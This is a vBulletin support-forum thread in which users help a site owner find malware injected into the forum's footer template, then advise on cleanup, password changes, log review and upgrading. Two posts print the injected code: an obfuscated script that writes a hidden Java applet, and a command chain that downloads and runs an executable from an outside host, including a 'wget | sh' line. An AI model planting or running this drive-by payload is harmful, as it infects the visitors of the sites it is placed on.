Announcement

Collapse
No announcement yet.

Vbulletin Virus URGENT HELP

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • ZeroHour
    replied
    [QUOTE=Tailfeathers;2175964]Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

    Was your mysql password the same as your ftp?
    What permissions were set on the dir they uploaded too?

    Leave a comment:


  • Tailfeathers
    replied
    Same thing happened to me, my FTP client says that a few files were uploaded at 1909 on the 20th. This was the code in the footer:

    Code:
    <script type='text/javascript' language='Javascript'>document.write(unescape('%3c%61%70%70%6c%65%74%20%77%69%64%74%68%3d%27%31%27%20%68%65%69%67%68%74%3d%27%31%27%20%63%6f%64%65%3d%27%4a%61%76%61%2e%63%6c%61%73%73%27%20%61%72%63%68%69%76%65%3d%27%4a%61%76%61%2e%6a%61%72%27%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%75%72%6c%27%20%76%61%6c%75%65%3d%27%68%74%74%70%3a%2f%2f%7a%6f%6c%75%73%2e%6f%72%67%2f%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%6c%6f%63%61%74%69%6f%6e%27%20%76%61%6c%75%65%3d%27%25%41%50%50%44%41%54%41%25%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%66%69%6c%65%27%20%76%61%6c%75%65%3d%27%73%2e%65%78%65%27%20%2f%3e%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%27%72%27%20%76%61%6c%75%65%20%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%67%6f%6f%67%6c%65%2e%63%6f%6d%27%20%2f%3e%3c%2f%61%70%70%6c%65%74%3e'));</script>
    It leads to some sort of script at zolus.org

    I've changed my forum password and am now asking my host to change my ftp password, as that's the only way I can think of that they'd be able to upload files to the server. I'm running 4.0.6 patch level 1, time to upgrade I guess...

    Leave a comment:


  • PondPikey
    replied
    Will do ZH, Again, much appreciated.

    Leave a comment:


  • ZeroHour
    replied
    Originally posted by PondPikey View Post
    A cheer for ZeroHour!

    Found the damn thing in the footer template. Removed, looking good! Ive upgraded and still unsure how that would be done.

    Really appreciated, pop in sometime, I do a great cup of tea!


    Find your apache logs and take a look through them for those accessing admincp/ etc other then your ip (www.whatismyip.com) to see if you can find the issue. Were you running 4.0.8 PL3?
    The logs will be key as there are rumours of a possible exploit in other versions but its all unconfirmed right now.
    The best thing you can do is zip up your http, error logs and admincp logs and send your story to vbulletin via the members area and give as best a timeline as possible to help them see if they spot anything. Also a mods list would be good as some mods had major holes (paste that here as well ideally)

    Leave a comment:


  • PondPikey
    replied
    A cheer for ZeroHour!

    Found the damn thing in the footer template. Removed, looking good! Ive upgraded and still unsure how that would be done.

    Really appreciated, pop in sometime, I do a great cup of tea!

    Leave a comment:


  • ZeroHour
    replied
    Found something:
    Code:
    <div id="box"> 
    <applet width='1' height='1' code='Client.class' archive='http://zolus.org/Client.jar'> 
    <param name='windows1' value='cmd.exe /c echo Const adTypeBinary = 1 > %temp%\winconfig.vbs & echo Const adSaveCreateOverWrite = 2 >> %temp%\winconfig.vbs & echo Dim S >> %temp%\winconfig.vbs & echo Dim A >> %temp%\winconfig.vbs & echo Dim DTNDTN >> %temp%\winconfig.vbs & echo S = "ADODB" >> %temp%\winconfig.vbs & echo A = ".Stream" >> %temp%\winconfig.vbs & echo Set DTNDTN = CreateObject(S+A) >> %temp%\winconfig.vbs & echo DTNDTN.Type = adTypeBinary >> %temp%\winconfig.vbs & echo DTNDTN.Open >> %temp%\winconfig.vbs & echo DTNDTN.Write BinaryGetURL(Wscript.Arguments(0)) >> %temp%\winconfig.vbs & echo DTNDTN.SaveToFile Wscript.Arguments(1), adSaveCreateOverWrite >> %temp%\winconfig.vbs & echo Function BinaryGetURL(URL) >> %temp%\winconfig.vbs & echo Dim Http >> %temp%\winconfig.vbs & echo Set Http = CreateObject("WinHttp.WinHttpRequest.5.1") >> %temp%\winconfig.vbs & echo Http.Open "GET", URL, False >> %temp%\winconfig.vbs & echo Http.Send >> %temp%\winconfig.vbs & echo BinaryGetURL = Http.ResponseBody >> %temp%\winconfig.vbs & echo End Function >> %temp%\winconfig.vbs & echo Set shell = CreateObject("WScript.Shell") >> %temp%\winconfig.vbs & echo shell.Run "%temp%\update.exe" >> %temp%\winconfig.vbs & start %temp%\winconfig.vbs  http://zolus.org/s.exe %temp%\update.exe'> 
    <param name='windows2' value=''> 
     
    <param name='unix1' value=""> 
    <param name='unix2' value=""> 
     
    <param name='linux1' value="wget  http://zolus.org/s.exe -O- | sh"> 
    <param name='linux2' value=""> 
     
    </applet> 
    </div>
    hxxp://www.carpy.co.uk/search.php?do=getdaily&contenttype=vBForum_Post but I think the default skin just changed?
    I think that skin has the problem. Java malware

    I have reported the jar host to google for malware blocking (not your site)

    Leave a comment:


  • PondPikey
    replied
    Ok Try now, version 4.1.4, uploaded new files and still having the issue

    Leave a comment:


  • setishock
    replied
    I get this error in FF. >>>
    Content Encoding Error
    The page you are trying to view cannot be shown because it uses an invalid or unsupported form of compression.
    Please contact the website owners to inform them of this problem.

    Leave a comment:


  • PondPikey
    replied
    Yup same errror on IEA and Chrom, Sophos reports it as a skiddie!

    Leave a comment:


  • ZeroHour
    replied
    Cant see anything initially, what AV is telling you there is a virus and what browser? Does it happen in other browsers?
    Short of seeing the site turned on with my dev tools I cant see the page problem.

    Leave a comment:


  • PondPikey
    replied
    Thanks ZeroHour, take a looksie...I cant see anything blatant..

    Thanks in advance

    htmlOuput.txt

    Leave a comment:


  • ZeroHour
    replied
    Could you view the html source in your browser and save the source to .txt and attach it?
    NOTE: not the php source or anything inside admincp templates, the source of the page which comes up with that error (just to be clear)

    Leave a comment:


  • PondPikey
    replied
    Click image for larger version

Name:	avg.JPG
Views:	1
Size:	20.1 KB
ID:	3682610

    See attached screenshot.

    Just taken a database backup. What should I be searching for on phpmyadmin?!

    Hope you can help!

    Leave a comment:


  • borbole
    replied
    Originally posted by PondPikey View Post
    Nope, but as soon as you log on it gets crazy!
    How exactly does it go crazy? Can you post a screenshot?

    Check the db for the malicious iframe code, more specifically the templates table. Ask your host as well to check their logs and see how they got access to your forum. After you clean up your forum, change all your log in infos and then upgrade it to 4.1.4 a.s.a.p.

    Leave a comment:


  • PondPikey
    replied
    Originally posted by Trevor Hannant View Post
    I don't see anything untoward in the source code for the 'board closed' page
    Nope, but as soon as you log on it gets crazy!

    Leave a comment:

widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
Working...
X